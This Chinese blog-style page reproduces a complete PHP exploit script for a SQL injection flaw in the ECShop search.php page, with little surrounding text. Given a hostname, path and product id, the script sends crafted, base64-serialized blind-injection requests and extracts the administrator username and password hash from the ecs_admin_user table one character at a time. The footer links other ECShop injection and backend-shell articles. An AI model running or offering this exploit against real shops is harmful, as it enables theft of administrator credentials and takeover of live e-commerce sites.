ecshop php过滤,ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞

最新推荐文章于 2023-05-04 10:30:43 发布
最新推荐文章于 2023-05-04 10:30:43 发布
阅读量156 收藏
点赞数
文章标签: ecshop php过滤

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== ECShop Search.php SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: jannock".

"\n[+] Team: [url]http://wavdb.com/[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path> <goods_id>".

"\n[+] Ex.: php ".$argv[0]." localhost / 1".

"\n\n");

}

function query($pos, $chr, $chs,$goodid)

{

switch ($chs){

case 0:

$query = "1=1";

break;

case 1:

$query = " ascii(substring((select user_name from ecs_admin_user limit 0,1),{$pos},1))={$chr}";

break;

case 2:

$query = " ascii(substring((select password from ecs_admin_user limit 0,1),{$pos},1))={$chr}";

break;

case 3:

$query = " length((select user_name from ecs_admin_user limit 0,1))={$pos}";

break;

}

$list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1' union select $goodid,1 from ecs_admin_user where 1=1 and ". $query ."/*"=>"1");

$query = array("attr"=>$list);

$query = str_replace('+', '%2b', base64_encode(serialize($query)));

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs,$goodid)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

$message = "GET ".$path."/search.php?encode=".query($pos, $chr, $chs,$goodid)." HTTP/1.1\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Connection: Close\r\n\r\n";

fwrite($conn, $message);

while (!feof($conn))

{

$reply .= fgets($conn, 1024);

}

fclose($conn);

return $reply;

}

function crkusername($hostname, $path, $chs,$goodid)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);

if (preg_match ("/javascript:addToCart/i", $response))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs,$goodid)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);

if (preg_match ("/javascript:addToCart/i", $response))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path,$chs, $goodid)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 1;

$chr = 0;

while ($exit==0)

{

$response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);

if (preg_match ("/javascript:addToCart/i", $response))

{

$exit = 1;

$length = $pos;

break;

}

else

{

$pos++;

if($pos>20)

{

exit("Exploit failed");

}

}

}

echo $length."\n";

return $length;

}

if ($argc != 4)

usage();

$hostname = $argv[1];

$path = $argv[2];

$goodid = $argv[3];

$length = lengthcolumns($hostname, $path, 3, $goodid);

crkusername($hostname, $path, 1,$goodid);

crkpassword($hostname, $path, 2,$goodid);

?>

weixin_39796855
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于PHPecShop PHP网上商城系统源码.zip
07-18
标题"基于PHPecShop PHP网上商城系统源码.zip"表明这是一个使用PHP编程语言开发的开源电子商务平台,名为ecShop。这个压缩包包含了该系统的全部源代码,供用户下载、研究或定制。ecShop是一个流行的电子商务解决...
sql注入(1)
weixin_45670595的博客
03-06 276
sql注入分类 数字型注入 $id =$_GET['id']; $sql= "SELECT * FROM users WHERE id = $id LIMIT 0,1"; $result = mysql_query($sql); $row = mysql_fetch($result); 字符型注入 $id =$_GET['id']; $sql= "SELECT * FROM users WHERE id = '$id' LIMIT 0,1"; $result = mysql_query($sql);
ecshop全系列SQL注入漏洞分析
d59hao的博客
05-04 284
referer值未加判断直接引用,可被攻击者控制输入利用_echash = “554fcae493e564ee0dc75bdf2ebf94ca” 为定值进行切分,构造payload利用反序列化漏洞,构造payload,传输恶意代码insert_ads函数的SQL拼接不规范导致存在SQL注入make_val函数拼接字符串输入,_eval中调用用户输入通过eval最终导致任意命令执行。
Ecshop模板开发(二十六):搜索功能实现
04-13 1342
1、html<div id="nav_mid"> <!--search start--> <div id="search" class=""> <div class="keys f_l"> {if $searchkeywords} {$lang.hot_search} : {foreach fr
EcShop开发手册
dkopg24406的专栏
09-05 1299
Ecshop文件结构 ecshop文件架构说明 ECShop 结构图及各文件相应功能介绍 ECShop upload 的目录 ┣ activity.php 活动列表 ┣ affiche.php 广告处理文件 ┣ affiliate.php 生成商品列表 ┣ article.php 文章内容 ┣ article_cat.php文章分类 ┣ au...
防止 PHP 应用程序中的 SQL 注入 - 简单而权威的指南
allway2的博客
08-16 586
在接下来的几周内,我们将讨论其他常见的安全漏洞,这些漏洞因糟糕或无用的建议泛滥而受到影响,以及一些有效的项目。准备好的语句保护您的 Web 应用程序和数据库服务器之间的交互(如果它们在不同的机器上,它们也应该通过 TLS 进行通信)。虽然更多人分享有关应用程序安全的知识是一件好事,但不幸的是,在 Internet 上流传的许多建议(尤其是在搜索引擎上排名靠前的古老博客文章中)已经过时、无意中误导,而且往往很危险。白名单是一种应用程序逻辑策略,它明确地只允许少数接受的值,而拒绝其余的值或使用合理的默认值。..
PHP实例开发源码—ecShop PHP网上商城系统源码.zip
11-22
【标题】"PHP实例开发源码—ecShop PHP网上商城系统源码.zip"是一个包含PHP编程语言实现的网上商城系统源代码的压缩包。ecShop是一款广泛应用的开源电子商务平台,它为开发者和商家提供了构建在线商店的功能。这个...
ECShop商城系统ecshopv2.7.3支持PHP5.3 5.4 5.5等版本
03-09
ECShop是一款广受欢迎的开源电子商务解决方案,特别针对中小企业设计,提供了强大的在线购物功能。这个版本是ECShop的2.7.3更新,经过了优化以兼容PHP 5.3、5.4和5.5等多个版本。对于那些正在寻找一个稳定且适应性强...
基于PHPECSHOP仿OPPO手机商城php版源码.zip
最新发布
08-26
7. **安全性**:学习如何在PHP中防止SQL注入、XSS攻击等,以确保商城的安全。 8. **性能优化**:理解缓存机制、数据库查询优化和页面加载速度提升的方法。 9. **响应式设计**:作为手机商城,适应各种设备的屏幕...
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8435
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
ecshop分词模糊搜索
12-02
安装说明: 1. 复制search 目录到网站根目录,请不要修改此文件夹的名称 2. 初次安装, 访问: 域名/search/baseline.php 例如:你的域名是www.ahuoo.com, 那么请访问 www.ahuoo.com/search/baseline.php 3. 修改代码 1.先备份网站根目录的search.php,然后用插件里面的替换掉 2.在模版中找到商品搜索页中的商品名称显示语句,有些模版在library/search_goods_list.lbi文件中,如果没有search_goods_list.lbi文件那就在search.dwt文件中。 语句如: <a href="{$goods.url}" title="{$goods.goods_name|escape:html}" class="name">{$goods.goods_name}</a> 将其中的{$goods.goods_name}改为{$goods.new_goods_name} 3. 在admin\goods.php文件中找到如下代码: sys_msg($is_insert ? $_LANG['add_goods_ok'] : $_LANG['edit_goods_ok'], 0, $link); 在此代码上一行前添加如下代码: require_once ('../search/delta.php'); //ahuoo 4. 在admin\category.php文件中找到如下代码: sys_msg($_LANG['catedit_succed'], 0, $link); 在此代码上一行前添加如下代码: require_once ('../search/delta.php'); //ahuoo 4. 如果需要添加自定义关键词可访问: 域名/search/add_word.php 一般情况下是不需要的。 插件原理: Ecshop默认情况下搜索是根据数据库按搜索的字符串去匹配,不能自动根据需要去自动分词。 例如:你搜索“李宁安踏” 标题里面必须要有“李宁安踏”才能出来, 如果某个商品标题只有“李宁”是不会出来的,这样对于普通的用户是不友好的。 本插件提供的功能: 1.提供一种强大的分词搜索,用户可以不用空格某几个分词,随便打一个句子就可以搜索出对应的结果 2.可以自定义分词。 3.搜索结果自动按照相关度排序,相关度越相关,越排在最前面。 插件为试用版,如果正式使用可以联系作者购买,当前只索引了商品的标题和分类信息,如果需要索引商品详情可以定制化开发,shopex也会有对应的版本。 插件作者 :阿虎 QQ:1976468723 演示地址: 前台:http://ahuoo.com/ec/search.php?encode=YTo0OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAiO3M6ODoia2V5d29yZHMiO3M6MTI6IuiBlOmAmuS4ieaYnyI7czoxMDoiaW1hZ2VGaWVsZCI7czowOiIiO3M6MTg6InNlYXJjaF9lbmNvZGVfdGltZSI7aToxNDQ5MDYxNTAzO30= 后台: http://ahuoo.com/ec/admin 用户名/密码:test/test123
Ecshop支付宝插件SQL注入漏洞利用(exp)
热门推荐
Exploit的小站~
05-10 3万+
 0x00 在\includes\modules\payment\alipay.php文件中,有一个response函数用来处理支付信息,在ECSHOP的init初始化文件中,默认是做了全局转义的,而这个漏洞的精髓在于绕过全局转义。 在$order_sn=str_replace($_GET['subject'],'',$_GET['out_trade_no']);中...
ECSHOP搜索产品url网址search.php地址很长处理方法
lcw2007101的专栏
04-23 2017
ecshop,在搜索产品时候出现的地址很长,比如 search.php? encode = YTo0OntzOjg6ImNhdGVnb3J5 IjtzOjE6IjAiO3M6ODoia2V5d29yZHMiO3M6MToiZCI7czoxMDoiaW1hZ2VGaWVsZCI7czowOiIiO3M6MTg6InNlYXJjaF9lbmNvZGVfdGltZ 代码后缀直  大家使用ec
高级SQL注入:混淆和绕过
kezhen的专栏
08-11 1914
#############  【0×00】 – 简介  【0×01】 – 过滤规避(Mysql)  【0x01a】 – 绕过函数和关键词的过滤  【0x01b】 – 绕过正则表达式过滤  【0×02】 – 常见绕过技术  【0×03】 – 高级绕过技术  【0x03a】 – HTTP参数污染:分离与结合  【0x03b】 – HTTP参数参杂  【0×04】 – 如何保护你的
ecshop /search.php SQL Injection Vul
weixin_34184158的博客
05-23 137
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 Relevant Link: http://sebug.net/vuldb/ssvid-62317 2. 漏洞触发条件 0x1: POC ...
ecshop常见漏洞
free_xiaochen的博客
10-13 6723
ECSHOP 常见注入漏洞分析和修复方法     优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台
ECSHOP全版本注入漏洞分析
11-25 3986
ECSHOP全版本注入漏洞分析   2014-04-03 10:34:52|  分类: Pentest-skills |举报 |字号 订阅           下载LOFTER 我的照片书  | 初学PHP,看了两天语法,找了ecshop全版本注入漏洞来分析,以小菜的角度沿着大牛的思路来前
ECshop--搜索模块细究
weixin_30872671的博客
07-01 136
ecshop细究 今天看了下ecshop搜索这块,前台数据一直到后台查询再返回前台。大致是这么个过程,首先,在index.dwt文件内,body下面引入了<!-- #BeginLibraryItem "/library/page_header.lbi" --><!-- #EndLibraryItem --> 即可重用的搜索模块代码,拼接在bod...
ecshop mysql 操作_ecshop数据库操作类
weixin_35935514的博客
01-21 141
ECShop v2.7.2没有使用一些开源的数据库操作类,比如adodb或者PEAR,而是封装了自己的实现。好处:实现非常轻量,只有一个文件,27Kb,大大减小了分发包的文件大小。当网站需要做memcached缓存时,也可以很方便的实现。缺点:数据库的选择非常狭窄,无法实现其它的非MySQL数据库。ECShop的数据操作类文件是includes/cls_mysql.php,类名是cls_mysql...
ECSHOP模板制作指南:PHP开源网店系统详细教程
本篇文档是关于E-CommerceOnlineShop网上商店系统PHP Ecshop官方模板制作引导手册,由Lu Hengqi编著,发布于2007年11月16日。该手册旨在帮助用户理解和操作Ecshop,一个由Comsenz公司开发的B2C独立网店系统,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值